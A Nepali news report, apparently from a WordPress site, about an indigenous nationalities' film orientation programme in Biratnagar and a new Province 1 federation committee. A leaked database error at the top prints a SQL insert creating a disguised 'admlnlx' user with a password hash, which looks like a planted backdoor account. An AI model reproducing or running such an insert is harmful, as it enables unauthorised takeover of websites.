WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ2yfcxVt4BrJfZdcLuDhyelHzSfy8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:08:19', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । आदिवासी जनजाति चलचित्र बिषयक देशब्यापी अभिमुखीकरण कार्यक्रम बिराटनगरमा सम्पन्न भएको छ । चलचित्र बिकास बोर्डको सहकार्य र आदिवासी जनजाति चलचित्र महासंघको आयोजनामा कार्यक्रम गरिएको हो ।
कार्यक्रममा उपस्थित भेलाले ज्योतिराज राईको अध्यक्षतामा ९ सदस्या आदिवासी जनजाति चलचित्र महासंघ १ नम्बर प्रदेश समिति गठन गरेको छ ।
तीन उपाध्यक्षमा भुपेन्द्र तुम्बाहाम्फे लिम्बू, दिप नारायण राजवंशी र ध्रुव चौधरी, महासचिव सुमन तामाङ चयन हुनुभएको छ भने दुई सचिव राजु माझी, सुरेन्द्र राज भुजेल र कोषाध्यक्षमा पेशल कुमार सुनुवार रहनु भएको छ ।
अमृत कुमार सुनुवारको सभापतित्वमा सम्पन्न कार्यक्रमको प्रमुख अतिथि प्रदेश नं। १ का सामाजिक विकास मन्त्री राजन राईको रहनु भएको थियो ।
कार्यक्रममा विभिन्न आदिवासी जनजाती संस्थाका अध्यक्ष एवम पदाधिकारी, प्रदेश नम्बर १ का सम्पूर्ण आदिवासी जनजाति चलचित्रकर्मी र पत्रकारहरुको उपस्थित रहेको थियो ।